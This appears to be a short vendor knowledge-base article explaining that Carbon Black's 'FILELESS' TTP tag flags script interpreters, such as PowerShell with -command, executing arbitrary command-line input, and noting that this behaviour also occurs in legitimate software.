Environment
- CB Cloud: All Versions
- Endpoint Standard: All Versions
Question
What does FILELESS TTP mean?
Answer
The Fileless TTP is something that can apply to most script interpreters, such as Python, Powershell, Ruby, etc. Due to the wide range of interpreters, the details are necessarily different for each, but essentially we look for indicators of a command line execution of arbitrary input. For Powershell, -command is one such indicator.
Additional Notes
Fileless behavior can be an indicator of compromise but also occurs in perfectly legitimate applications. If it is an on disk script subsequently performing fileless activity, this model is also common to malicious code. The TTP: FILELESS is appropriate in this case even though the script is not itself malicious.
Related Content